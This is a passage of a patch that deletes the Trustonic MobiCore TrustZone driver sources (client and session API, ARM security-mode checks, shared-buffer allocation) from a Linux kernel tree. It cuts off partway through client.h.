--		MCDRV_ERROR("Could not create client");
--		return NULL;
--	}
--
--	/* Add client to list of clients */
--	mutex_lock(&api_ctx.clients_lock);
--	list_add_tail(&client->list, &api_ctx.clients);
--	mutex_unlock(&api_ctx.clients_lock);
--
--	MCDRV_DBG("created client %p", client);
--	return client;
--}
--
--/*
-- * Try and mark client as "closing"
-- * @return tbase driver error code
-- */
--int api_freeze_device(struct tbase_client *client)
--{
--	int err = 0;
--
--	if (!client_set_closing(client))
--		err = -ENOTEMPTY;
--
--	MCDRV_DBG("client %p, exit with %d\n", client, err);
--	return err;
--}
--
--/*
-- * Release a client and the session+cbuf objects it contains.
-- * @param client_t client
-- * @return tbase driver error code
-- */
--void api_close_device(struct tbase_client *client)
--{
--	/* Remove client from list of active clients */
--	mutex_lock(&api_ctx.clients_lock);
--	list_del(&client->list);
--	mutex_unlock(&api_ctx.clients_lock);
--	/* Close all remaining sessions */
--	client_close_sessions(client);
--	client_put(client);
--	MCDRV_DBG("client %p closed\n", client);
--}
--
--/*
-- * Open TA for given client. TA binary is provided by the daemon.
-- * @param
-- * @return tbase driver error code
-- */
--int api_open_session(struct tbase_client	*client,
--		     uint32_t		*p_session_id,
--		     const struct mc_uuid_t *uuid,
--		     uintptr_t		tci,
--		     size_t		tci_len,
--		     bool		is_gp_uuid,
--		     struct mc_identity	*identity)
--{
--	int err = 0;
--	uint32_t sid = 0;
--	struct tbase_object *obj;
--
--	/* Check parameters */
--	if (!p_session_id)
--		return -EINVAL;
--
--	if (!uuid)
--		return -EINVAL;
--
--	/* Get secure object */
--	obj = tbase_object_get(uuid, is_gp_uuid);
--	if (IS_ERR(obj)) {
--		/* Try to select secure object inside the SWd if not found */
--		if ((PTR_ERR(obj) == -ENOENT) && g_ctx.f_ta_auth)
--			obj = tbase_object_select(uuid);
--
--		if (IS_ERR(obj)) {
--			err = PTR_ERR(obj);
--			goto end;
--		}
--	}
--
--	/* Open session */
--	err = client_add_session(client, obj, tci, tci_len, &sid, is_gp_uuid,
--				 identity);
--	/* Fill in return parameter */
--	if (!err)
--		*p_session_id = sid;
--
--	/* Delete secure object */
--	tbase_object_free(obj);
--
--end:
--
--	MCDRV_DBG("session %x, exit with %d\n", sid, err);
--	return err;
--}
--
--/*
-- * Open TA for given client. TA binary is provided by the client.
-- * @param
-- * @return tbase driver error code
-- */
--int api_open_trustlet(struct tbase_client	*client,
--		      uint32_t		*p_session_id,
--		      uint32_t		spid,
--		      uintptr_t		trustlet,
--		      size_t		trustlet_len,
--		      uintptr_t		tci,
--		      size_t		tci_len)
--{
--	struct tbase_object *obj;
--	struct mc_identity identity = {
--		.login_type = TEEC_LOGIN_PUBLIC,
--	};
--	uint32_t sid = 0;
--	int err = 0;
--
--	/* Check parameters */
--	if (!p_session_id)
--		return -EINVAL;
--
--	/* Create secure object from user-space trustlet binary */
--	obj = tbase_object_read(spid, trustlet, trustlet_len);
--	if (IS_ERR(obj)) {
--		err = PTR_ERR(obj);
--		goto end;
--	}
--
--	/* Open session */
--	err = client_add_session(client, obj, tci, tci_len, &sid, false,
--				 &identity);
--	/* Fill in return parameter */
--	if (!err)
--		*p_session_id = sid;
--
--	/* Delete secure object */
--	tbase_object_free(obj);
--
--end:
--	MCDRV_DBG("session %x, exit with %d\n", sid, err);
--	return err;
--}
--
--/*
-- * Close a TA
-- * @param
-- * @return tbase driver error code
-- */
--int api_close_session(struct tbase_client *client, uint32_t session_id)
--{
--	int ret = client_remove_session(client, session_id);
--
--	MCDRV_DBG("session %x, exit with %d\n", session_id, ret);
--	return ret;
--}
--
--/*
-- * Send a notification to TA
-- * @return tbase driver error code
-- */
--int api_notify(struct tbase_client *client, uint32_t session_id)
--{
--	int err = 0;
--	struct tbase_session *session = NULL;
--
--	/* Acquire session */
--	session = client_ref_session(client, session_id);
--
--	/* Send command to SWd */
--	if (!session) {
--		err = -ENXIO;
--	} else {
--		err = session_notify_swd(session);
--
--		/* Release session */
--		client_unref_session(session);
--	}
--
--	MCDRV_DBG("session %x, exit with %d\n", session_id, err);
--	return err;
--}
--
--/*
-- * Wait for a notification from TA
-- * @return tbase driver error code
-- */
--int api_wait_notification(struct tbase_client *client,
--			  uint32_t session_id,
--			  int32_t timeout)
--{
--	int err = 0;
--	struct tbase_session *session = NULL;
--
--	/* Acquire session */
--	session = client_ref_session(client, session_id);
--
--	/* Wait for notification */
--	if (!session) {
--		err = -ENXIO;
--	} else {
--		err = session_waitnotif(session, timeout);
--
--		/* Release session */
--		client_unref_session(session);
--	}
--
--	MCDRV_DBG("session %x, exit with %d\n", session_id, err);
--	return err;
--}
--
--/*
-- * Allocate a contiguous buffer (cbuf) for given client
-- *
-- * @param client		client
-- * @param len			size of the cbuf
-- * @param **p_addr		pointer to the cbuf kva
-- * @return tbase driver error code
-- */
--int api_malloc_cbuf(struct tbase_client *client, uint32_t len,
--		    uintptr_t *addr, struct vm_area_struct *vmarea)
--{
--	int err = tbase_cbuf_alloc(client, len, addr, vmarea);
--
--	MCDRV_DBG("exit with %d\n", err);
--	return err;
--}
--
--/*
-- * Free a contiguous buffer from given client
-- * @param client
-- * @param addr		kernel virtual address of the buffer
-- *
-- * @return tbase driver error code
-- */
--int api_free_cbuf(struct tbase_client *client, uintptr_t addr)
--{
--	int err = tbase_cbuf_free(client, addr);
--
--	MCDRV_DBG("@ 0x%lx, exit with %d\n", addr, err);
--	return err;
--}
--
--/* Share a buffer with given TA in SWd */
--int api_map_wsms(struct tbase_client *client, uint32_t session_id,
--		 struct mc_ioctl_buffer *bufs)
--{
--	struct tbase_session *session = NULL;
--	int err = 0;
--
--	if (!client)
--		return -EINVAL;
--
--	if (!bufs)
--		return -EINVAL;
--
--	/* Acquire session */
--	session = client_ref_session(client, session_id);
--
--	if (session) {
--		/* Add buffer to the session */
--		err = session_wsms_add(session, bufs);
--
--		/* Release session */
--		client_unref_session(session);
--	} else {
--		err = -ENXIO;
--	}
--
--	MCDRV_DBG("exit with %d\n", err);
--	return err;
--}
--
--/* Stop sharing a buffer with SWd */
--int api_unmap_wsms(struct tbase_client *client, uint32_t session_id,
--		   const struct mc_ioctl_buffer *bufs)
--{
--	struct tbase_session *session = NULL;
--	int err = 0;
--
--	if (!client)
--		return -EINVAL;
--
--	if (!bufs)
--		return -EINVAL;
--
--	/* Acquire session */
--	session = client_ref_session(client, session_id);
--
--	if (!session) {
--		err = -ENXIO;
--	} else {
--		/* Remove buffer from session */
--		err = session_wsms_remove(session, bufs);
--		/* Release session */
--		client_unref_session(session);
--	}
--
--	MCDRV_DBG("exit with %d\n", err);
--	return err;
--}
--
--/*
-- * Read session exit/termination code
-- */
--int api_get_session_exitcode(struct tbase_client *client, uint32_t session_id,
--			     int32_t *exit_code)
--{
--	int err = 0;
--	struct tbase_session *session;
--
--	/* Acquire session */
--	session = client_ref_session(client, session_id);
--
--	if (!session) {
--		err = -ENXIO;
--	} else {
--		/* Retrieve error */
--		*exit_code = session_exitcode(session);
--
--		/* Release session */
--		client_unref_session(session);
--
--		err = 0;
--	}
--
--	MCDRV_DBG("session %x, exit with %d\n", session_id, err);
--	return err;
--}
--
--void api_init(void)
--{
--	INIT_LIST_HEAD(&api_ctx.clients);
--	mutex_init(&api_ctx.clients_lock);
--
--	INIT_LIST_HEAD(&g_ctx.closing_sess);
--	mutex_init(&g_ctx.closing_lock);
--}
--
--int api_info(struct kasnprintf_buf *buf)
--{
--	struct tbase_client *client;
--	struct tbase_session *session;
--	ssize_t ret = 0;
--
--	mutex_lock(&api_ctx.clients_lock);
--	if (list_empty(&api_ctx.clients))
--		goto done;
--
--	list_for_each_entry(client, &api_ctx.clients, list) {
--		ret = client_info(client, buf);
--		if (ret < 0)
--			break;
--	}
--
--done:
--	mutex_unlock(&api_ctx.clients_lock);
--
--	if (ret >= 0) {
--		mutex_lock(&g_ctx.closing_lock);
--		if (!list_empty(&g_ctx.closing_sess))
--			ret = kasnprintf(buf, "closing sessions:\n");
--
--		list_for_each_entry(session, &g_ctx.closing_sess, list) {
--			ret = session_info(session, buf);
--			if (ret < 0)
--				break;
--		}
--
--		mutex_unlock(&g_ctx.closing_lock);
--	}
--
--	return ret;
--}
-diff --git a/drivers/gud/MobiCoreDriver/api.h b/drivers/gud/MobiCoreDriver/api.h
-deleted file mode 100644
-index 740ec7fb2d5b9..0000000000000
---- a/drivers/gud/MobiCoreDriver/api.h
-+++ /dev/null
-@@ -1,46 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _API_H_
--#define _API_H_
--
--struct tbase_client;
--
--struct tbase_client *api_open_device(bool is_from_kernel);
--int api_freeze_device(struct tbase_client *client);
--void api_close_device(struct tbase_client *client);
--int api_open_session(struct tbase_client *client, uint32_t *session_id,
--		     const struct mc_uuid_t *uuid,
--		     uintptr_t tci, size_t tci_len, bool is_gp_uuid,
--		     struct mc_identity *identity);
--int api_open_trustlet(struct tbase_client *client, uint32_t *session_id,
--		      uint32_t spid, uintptr_t trustlet, size_t trustlet_len,
--		      uintptr_t tci, size_t tci_len);
--int api_close_session(struct tbase_client *client, uint32_t session_id);
--int api_notify(struct tbase_client *client, uint32_t session_id);
--int api_wait_notification(struct tbase_client *client, uint32_t session_id,
--			  int32_t timeout);
--int api_malloc_cbuf(struct tbase_client *client, uint32_t len, uintptr_t *addr,
--		    struct vm_area_struct *vmarea);
--int api_free_cbuf(struct tbase_client *client, uintptr_t addr);
--int api_map_wsms(struct tbase_client *client, uint32_t session_id,
--		 struct mc_ioctl_buffer *bufs);
--int api_unmap_wsms(struct tbase_client *client, uint32_t session_id,
--		   const struct mc_ioctl_buffer *bufs);
--int api_get_session_exitcode(struct tbase_client *client, uint32_t session_id,
--			     int32_t *exit_code);
--void api_init(void);
--int api_info(struct kasnprintf_buf *buf);
--
--#endif  /* _API_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/arm.h b/drivers/gud/MobiCoreDriver/arm.h
-deleted file mode 100644
-index 58d91f11f789c..0000000000000
---- a/drivers/gud/MobiCoreDriver/arm.h
-+++ /dev/null
-@@ -1,88 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_ARM_H_
--#define _MC_ARM_H_
--
--#include "debug.h"
--
--#ifdef CONFIG_ARM64
--inline bool has_security_extensions(void)
--{
--	return true;
--}
--
--inline bool is_secure_mode(void)
--{
--	return false;
--}
--#else
--/*
-- * ARM Trustzone specific masks and modes
-- * Vanilla Linux is unaware of TrustZone extension.
-- * I.e. arch/arm/include/asm/ptrace.h does not define monitor mode.
-- * Also TZ bits in cpuid are not defined, ARM port uses magic numbers,
-- * see arch/arm/kernel/setup.c
-- */
--#define ARM_MONITOR_MODE		(0x16) /*(0b10110)*/
--#define ARM_SECURITY_EXTENSION_MASK	(0x30)
--
--/* check if CPU supports the ARM TrustZone Security Extensions */
--inline bool has_security_extensions(void)
--{
--	u32 fea = 0;
--
--	asm volatile(
--		"mrc p15, 0, %[fea], cr0, cr1, 0" :
--		[fea]"=r" (fea));
--
--	MCDRV_DBG_VERBOSE("CPU Features: 0x%X", fea);
--
--	/*
--	 * If the CPU features ID has 0 for security features then the CPU
--	 * doesn't support TrustZone at all!
--	 */
--	if ((fea & ARM_SECURITY_EXTENSION_MASK) == 0)
--		return false;
--
--	return true;
--}
--
--/* check if running in secure mode */
--inline bool is_secure_mode(void)
--{
--	u32 cpsr = 0;
--	u32 nsacr = 0;
--
--	asm volatile(
--		"mrc	p15, 0, %[nsacr], cr1, cr1, 2\n"
--		"mrs %[cpsr], cpsr\n" :
--		[nsacr]"=r" (nsacr),
--		[cpsr]"=r"(cpsr));
--
--	MCDRV_DBG_VERBOSE("CPRS.M = set to 0x%X\n", cpsr & MODE_MASK);
--	MCDRV_DBG_VERBOSE("SCR.NS = set to 0x%X\n", nsacr);
--
--	/*
--	 * If the NSACR contains the reset value(=0) then most likely we are
--	 * running in Secure MODE.
--	 * If the cpsr mode is set to monitor mode then we cannot load!
--	 */
--	if (nsacr == 0 || ((cpsr & MODE_MASK) == ARM_MONITOR_MODE))
--		return true;
--
--	return false;
--}
--#endif
--
--#endif /* _MC_ARM_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/build_tag.h b/drivers/gud/MobiCoreDriver/build_tag.h
-deleted file mode 100644
-index 51a5d3e0ae7f5..0000000000000
---- a/drivers/gud/MobiCoreDriver/build_tag.h
-+++ /dev/null
-@@ -1,15 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#define MOBICORE_COMPONENT_BUILD_TAG \
--	"t-base-QC-MSM8996-Android-302B-V001-20150529_084320_16"
-diff --git a/drivers/gud/MobiCoreDriver/client.c b/drivers/gud/MobiCoreDriver/client.c
-deleted file mode 100644
-index c8bdc07b8742d..0000000000000
---- a/drivers/gud/MobiCoreDriver/client.c
-+++ /dev/null
-@@ -1,572 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include <linux/list.h>
--#include <linux/slab.h>
--#include <linux/device.h>
--#include <linux/mm.h>
--#include <linux/sched.h>
--#include <linux/err.h>
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--
--#include "main.h"
--#include "debug.h"
--#include "mcp.h"
--#include "mmu.h"
--#include "session.h"
--#include "client.h"
--
--/*
-- * Contiguous buffer allocated to TLCs.
-- * These buffers are used as world shared memory (wsm) to share with
-- * secure world.
-- */
--struct tbase_cbuf {
--	/* Client this cbuf belongs to */
--	struct tbase_client	*client;
--	/* List element for client's list of cbuf's */
--	struct list_head	list;
--	/* Number of references kept to this buffer */
--	struct kref		kref;
--	/* virtual Kernel start address */
--	uintptr_t		addr;
--	/* virtual Userspace start address */
--	uintptr_t		uaddr;
--	/* physical start address */
--	phys_addr_t		phys;
--	/* 2^order = number of pages allocated */
--	unsigned int		order;
--	/* Length of memory mapped to user */
--	uint32_t		len;
--};
--
--/*
-- * Map a kernel contiguous buffer to user space
-- */
--static int map_cbuf(struct vm_area_struct *vmarea, uintptr_t addr, uint32_t len,
--		    uintptr_t *uaddr)
--{
--	int ret;
--
--	if (WARN(!uaddr, "No uaddr pointer available"))
--		return -EINVAL;
--
--	if (WARN(!vmarea, "No vma available"))
--		return -EINVAL;
--
--	if (WARN(!addr, "No addr available"))
--		return -EINVAL;
--
--	if (len != (uint32_t)(vmarea->vm_end - vmarea->vm_start)) {
--		MCDRV_ERROR("cbuf incompatible with vma");
--		return -EINVAL;
--	}
--
--	vmarea->vm_flags |= VM_IO;
--
--	/* CPI todo: use io_remap_page_range() to be consistent with VM_IO ? */
--	ret = remap_pfn_range(vmarea, vmarea->vm_start,
--			      page_to_pfn(virt_to_page(addr)),
--			      vmarea->vm_end - vmarea->vm_start,
--			      vmarea->vm_page_prot);
--	if (ret) {
--		*uaddr = 0;
--		MCDRV_ERROR("User mapping failed");
--		return ret;
--	}
--
--	*uaddr = vmarea->vm_start;
--	return 0;
--}
--
--/*
-- * Allocate and initialize a client object
-- */
--struct tbase_client *client_create(bool is_from_kernel)
--{
--	struct tbase_client *client;
--
--	/* allocate client structure */
--	client = kzalloc(sizeof(*client), GFP_KERNEL);
--	if (!client) {
--		MCDRV_ERROR("Allocation failure");
--		return NULL;
--	}
--
--	/* init members */
--	client->pid = is_from_kernel ? 0 : current->pid;
--	memcpy(client->comm, current->comm, sizeof(client->comm));
--	kref_init(&client->kref);
--	INIT_LIST_HEAD(&client->cbufs);
--	mutex_init(&client->cbufs_lock);
--	INIT_LIST_HEAD(&client->sessions);
--	mutex_init(&client->sessions_lock);
--	INIT_LIST_HEAD(&client->list);
--
--	return client;
--}
--
--/*
-- * At this point, nobody has access to the client anymore, so no new sessions
-- * are coming.
-- */
--void client_close_sessions(struct tbase_client *client)
--{
--	struct tbase_session *session;
--
--	mutex_lock(&client->sessions_lock);
--	while (!list_empty(&client->sessions)) {
--		session = list_first_entry(&client->sessions,
--					   struct tbase_session, list);
--
--		/* Move session to closing sessions list */
--		mutex_lock(&g_ctx.closing_lock);
--		list_move(&session->list, &g_ctx.closing_sess);
--		mutex_unlock(&g_ctx.closing_lock);
--		/* Call session_close without lock */
--		mutex_unlock(&client->sessions_lock);
--		session_close(session);
--		mutex_lock(&client->sessions_lock);
--	}
--
--	mutex_unlock(&client->sessions_lock);
--}
--
--/*
-- * Free client object + all objects it contains.
-- * Can be called only by last user referencing the client,
-- * therefore mutex lock seems overkill
-- */
--static void client_release(struct kref *kref)
--{
--	struct tbase_client *client;
--
--	client = container_of(kref, struct tbase_client, kref);
--	kfree(client);
--}
--
--void client_put(struct tbase_client *client)
--{
--	kref_put(&client->kref, client_release);
--}
--
--/*
-- * Returns true if client is a kernel object.
-- */
--bool client_is_kernel(struct tbase_client *client)
--{
--	return !client->pid;
--}
--
--/*
-- * Set client "closing" state, only if it contains no session.
-- * Once in "closing" state, system "close" can be called.
-- * Return: true if this state could be set.
-- */
--bool client_set_closing(struct tbase_client *client)
--{
--	bool clear = false;
--
--	/* Check for sessions */
--	mutex_lock(&client->sessions_lock);
--	clear = list_empty(&client->sessions);
--	client->closing = clear;
--	mutex_unlock(&client->sessions_lock);
--	MCDRV_DBG("return %d", clear);
--	return clear;
--}
--
--/*
-- * Opens a TA and add corresponding session object to given client
-- * return: t-base driver error code
-- */
--int client_add_session(struct tbase_client *client,
--		       const struct tbase_object *obj, uintptr_t tci,
--		       size_t len, uint32_t *session_id, bool is_gp,
--		       struct mc_identity *identity)
--{
--	struct tbase_session *session = NULL;
--	struct tbase_mmu *obj_mmu = NULL;
--	int ret = 0;
--
--	/*
--	 * Create session object with temp sid=0 BEFORE session is started,
--	 * otherwise if a GP TA is started and NWd session object allocation
--	 * fails, we cannot handle the potentially delayed GP closing.
--	 * Adding session to list must be done AFTER it is started (once we have
--	 * sid), therefore it cannot be done within session_create().
--	 */
--	session = session_create(client, is_gp, identity);
--	if (IS_ERR(session))
--		return PTR_ERR(session);
--
--	/* Create blob L2 table (blob is allocated by driver, so task=NULL) */
--	obj_mmu = tbase_mmu_create(NULL, obj->data, obj->length);
--	if (IS_ERR(obj_mmu)) {
--		ret = PTR_ERR(obj_mmu);
--		goto err;
--	}
--
--	/* Open session */
--	ret = session_open(session, obj, obj_mmu, tci, len);
--	/* Blob table no more needed in any case */
--	tbase_mmu_delete(obj_mmu);
--	if (ret)
--		goto err;
--
--	mutex_lock(&client->sessions_lock);
--	if (unlikely(client->closing)) {
--		/* Client has been frozen, no more sessions allowed */
--		ret = -ENODEV;
--	} else {
--		/* Add session to client */
--		list_add(&session->list, &client->sessions);
--		/* Set sid returned by SWd */
--		*session_id = session->mcp_session.id;
--	}
--
--	mutex_unlock(&client->sessions_lock);
--
--err:
--	/* Close or free session on error */
--	if (ret == -ENODEV) {
--		/* The session must enter the closing process... */
--		mutex_lock(&g_ctx.closing_lock);
--		list_add(&session->list, &g_ctx.closing_sess);
--		mutex_unlock(&g_ctx.closing_lock);
--		session_close(session);
--	} else if (ret) {
--		session_put(session);
--	}
--
--	return ret;
--}
--
--/*
-- * Remove a session object from client and close corresponding TA
-- * Return: true if session was found and closed
-- */
--int client_remove_session(struct tbase_client *client, uint32_t session_id)
--{
--	struct tbase_session *session = NULL, *candidate;
--
--	/* Move session from main list to closing list */
--	mutex_lock(&client->sessions_lock);
--	list_for_each_entry(candidate, &client->sessions, list) {
--		if (candidate->mcp_session.id == session_id) {
--			session = candidate;
--			mutex_lock(&g_ctx.closing_lock);
--			list_move(&session->list, &g_ctx.closing_sess);
--			mutex_unlock(&g_ctx.closing_lock);
--			break;
--		}
--	}
--
--	mutex_unlock(&client->sessions_lock);
--
--	/* Close session */
--	return session_close(session);
--}
--
--/*
-- * Find a session object and increment its reference counter.
-- * Object cannot be freed until its counter reaches 0.
-- * return: pointer to the object, NULL if not found.
-- */
--struct tbase_session *client_ref_session(struct tbase_client *client,
--					 uint32_t session_id)
--{
--	struct tbase_session *session = NULL, *candidate;
--
--	mutex_lock(&client->sessions_lock);
--	list_for_each_entry(candidate, &client->sessions, list) {
--		if (candidate->mcp_session.id == session_id) {
--			session = candidate;
--			session_get(session);
--			break;
--		}
--	}
--
--	mutex_unlock(&client->sessions_lock);
--	return session;
--}
--
--/*
-- * Decrement a session object's reference counter, and frees the object if it
-- * was the last reference.
-- * No lookup since session may have been removed from list
-- */
--void client_unref_session(struct tbase_session *session)
--{
--	session_put(session);
--}
--
--static inline int cbuf_info(struct tbase_cbuf *cbuf,
--			    struct kasnprintf_buf *buf);
--
--int client_info(struct tbase_client *client, struct kasnprintf_buf *buf)
--{
--	struct tbase_cbuf *cbuf;
--	struct tbase_session *session;
--	int ret;
--
--	if (client->pid)
--		ret = kasnprintf(buf, "client %p: %s (%d)\n", client,
--				 client->comm, client->pid);
--	else
--		ret = kasnprintf(buf, "client %p: [kernel]\n", client);
--
--	if (ret < 0)
--		return ret;
--
--	/* Buffers */
--	mutex_lock(&client->cbufs_lock);
--	if (list_empty(&client->cbufs))
--		goto done_cbufs;
--
--	list_for_each_entry(cbuf, &client->cbufs, list) {
--		ret = cbuf_info(cbuf, buf);
--		if (ret < 0)
--			goto done_cbufs;
--	}
--
--done_cbufs:
--	mutex_unlock(&client->cbufs_lock);
--	if (ret < 0)
--		return ret;
--
--	/* Sessions */
--	mutex_lock(&client->sessions_lock);
--	if (list_empty(&client->sessions))
--		goto done_sessions;
--
--	list_for_each_entry(session, &client->sessions, list) {
--		ret = session_info(session, buf);
--		if (ret < 0)
--			goto done_sessions;
--	}
--
--done_sessions:
--	mutex_unlock(&client->sessions_lock);
--
--	if (ret < 0)
--		return ret;
--
--	return 0;
--}
--
--/*
-- * This callback is called on remap
-- */
--static void cbuf_vm_open(struct vm_area_struct *vmarea)
--{
--	struct tbase_cbuf *cbuf = vmarea->vm_private_data;
--
--	tbase_cbuf_get(cbuf);
--}
--
--/*
-- * This callback is called on unmap
-- */
--static void cbuf_vm_close(struct vm_area_struct *vmarea)
--{
--	struct tbase_cbuf *cbuf = vmarea->vm_private_data;
--
--	tbase_cbuf_put(cbuf);
--}
--
--static struct vm_operations_struct cbuf_vm_ops = {
--	.open = cbuf_vm_open,
--	.close = cbuf_vm_close,
--};
--
--/*
-- * Create a cbuf object and add it to client
-- */
--int tbase_cbuf_alloc(struct tbase_client *client, uint32_t len,
--		     uintptr_t *p_addr,
--		     struct vm_area_struct *vmarea)
--{
--	int err = 0;
--	struct tbase_cbuf *cbuf = NULL;
--	unsigned int order;
--
--	if (WARN(!client, "No client available"))
--		return -EINVAL;
--
--	if (WARN(!len, "No len available"))
--		return -EINVAL;
--
--	order = get_order(len);
--	if (order > MAX_ORDER) {
--		MCDRV_DBG_WARN("Buffer size too large");
--		return -ENOMEM;
--	}
--
--	/* Allocate buffer descriptor structure */
--	cbuf = kzalloc(sizeof(*cbuf), GFP_KERNEL);
--	if (!cbuf) {
--		MCDRV_DBG_WARN("kzalloc failed");
--		return -ENOMEM;
--	}
--
--	/* Allocate buffer */
--	cbuf->addr = __get_free_pages(GFP_USER | __GFP_ZERO, order);
--	if (!cbuf->addr) {
--		MCDRV_DBG_WARN("get_free_pages failed");
--		kfree(cbuf);
--		return -ENOMEM;
--	}
--
--	/* Map to user space if applicable */
--	if (!client_is_kernel(client)) {
--		err = map_cbuf(vmarea, cbuf->addr, len, &cbuf->uaddr);
--		if (err) {
--			free_pages(cbuf->addr, order);
--			kfree(cbuf);
--			return err;
--		}
--	}
--
--	/* Init descriptor members */
--	cbuf->client = client;
--	cbuf->phys = virt_to_phys((void *)cbuf->addr);
--	cbuf->len = len;
--	cbuf->order = order;
--	kref_init(&cbuf->kref);
--	INIT_LIST_HEAD(&cbuf->list);
--
--	/* Keep cbuf in VMA private data for refcounting (user-space clients) */
--	if (vmarea) {
--		vmarea->vm_private_data = cbuf;
--		vmarea->vm_ops = &cbuf_vm_ops;
--	}
--
--	/* Fill return parameter for k-api */
--	if (p_addr)
--		*p_addr = cbuf->addr;
--
--	/* Get a token on the client */
--	client_get(client);
--
--	/* Add buffer to list */
--	mutex_lock(&client->cbufs_lock);
--	list_add(&cbuf->list, &client->cbufs);
--	mutex_unlock(&client->cbufs_lock);
--	MCDRV_DBG("created cbuf %p: client %p addr %lx uaddr %lx len %u",
--		  cbuf, client, cbuf->addr, cbuf->uaddr, cbuf->len);
--	return err;
--}
--
--/*
-- * Remove a cbuf object from client, and mark it for freeing.
-- * Freeing will happen once all current references are released.
-- */
--int tbase_cbuf_free(struct tbase_client *client, uintptr_t addr)
--{
--	struct tbase_cbuf *cbuf = tbase_cbuf_get_by_addr(client, addr);
--
--	if (!cbuf)
--		return -EINVAL;
--
--	/* Two references to put: the caller's and the one we just took */
--	tbase_cbuf_put(cbuf);
--	tbase_cbuf_put(cbuf);
--	return 0;
--}
--
--/*
-- * Find a contiguous buffer (cbuf) in the cbuf list of given client that
-- * contains given address and take a reference on it.
-- * Return pointer to the object, or NULL if not found.
-- */
--struct tbase_cbuf *tbase_cbuf_get_by_addr(struct tbase_client *client,
--					  uintptr_t addr)
--{
--	struct tbase_cbuf *cbuf = NULL, *candidate;
--	bool is_kernel = client_is_kernel(client);
--
--	mutex_lock(&client->cbufs_lock);
--	list_for_each_entry(candidate, &client->cbufs, list) {
--		/* Compare Vs kernel va OR user va depending on client type */
--		uintptr_t start = is_kernel ?
--			candidate->addr : candidate->uaddr;
--		uintptr_t end = start + candidate->len;
--
--		/* Check that (user) cbuf has not been unmapped */
--		if (!start)
--			break;
--
--		if ((addr >= start) && (addr < end)) {
--			cbuf = candidate;
--			break;
--		}
--	}
--
--	if (cbuf)
--		tbase_cbuf_get(cbuf);
--
--	mutex_unlock(&client->cbufs_lock);
--	return cbuf;
--}
--
--void tbase_cbuf_get(struct tbase_cbuf *cbuf)
--{
--	kref_get(&cbuf->kref);
--}
--
--static void cbuf_release(struct kref *kref)
--{
--	struct tbase_cbuf *cbuf = container_of(kref, struct tbase_cbuf, kref);
--	struct tbase_client *client = cbuf->client;
--
--	/* Unlist from client */
--	mutex_lock(&client->cbufs_lock);
--	list_del_init(&cbuf->list);
--	mutex_unlock(&client->cbufs_lock);
--	/* Release client token */
--	client_put(client);
--	/* Free */
--	free_pages(cbuf->addr, cbuf->order);
--	MCDRV_DBG("freed cbuf %p: client %p addr %lx uaddr %lx len %u",
--		  cbuf, client, cbuf->addr, cbuf->uaddr, cbuf->len);
--	kfree(cbuf);
--}
--
--void tbase_cbuf_put(struct tbase_cbuf *cbuf)
--{
--	kref_put(&cbuf->kref, cbuf_release);
--}
--
--uintptr_t tbase_cbuf_addr(struct tbase_cbuf *cbuf)
--{
--	return cbuf->addr;
--}
--
--uintptr_t tbase_cbuf_uaddr(struct tbase_cbuf *cbuf)
--{
--	return cbuf->uaddr;
--}
--
--uint32_t tbase_cbuf_len(struct tbase_cbuf *cbuf)
--{
--	return cbuf->len;
--}
--
--static inline int cbuf_info(struct tbase_cbuf *cbuf, struct kasnprintf_buf *buf)
--{
--	return kasnprintf(buf, "\tcbuf %p: addr %lx uaddr %lx len %u\n",
--			  cbuf, cbuf->addr, cbuf->uaddr, cbuf->len);
--}
-diff --git a/drivers/gud/MobiCoreDriver/client.h b/drivers/gud/MobiCoreDriver/client.h
-deleted file mode 100644
-index 3cc833eeffb87..0000000000000
---- a/drivers/gud/MobiCoreDriver/client.h
-+++ /dev/null
-@@ -1,99 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _CLIENT_H_
--#define _CLIENT_H_
--
--#include <linux/list.h>
--#include <linux/sched.h>	/* TASK_COMM_LEN */
--
--struct task_struct;
--struct tbase_object;
--struct tbase_session;
--
--struct tbase_client {
--	/* PID of task that opened the device, 0 if kernel */
--	pid_t			pid;
--	/* Command for task*/
--	char			comm[TASK_COMM_LEN];
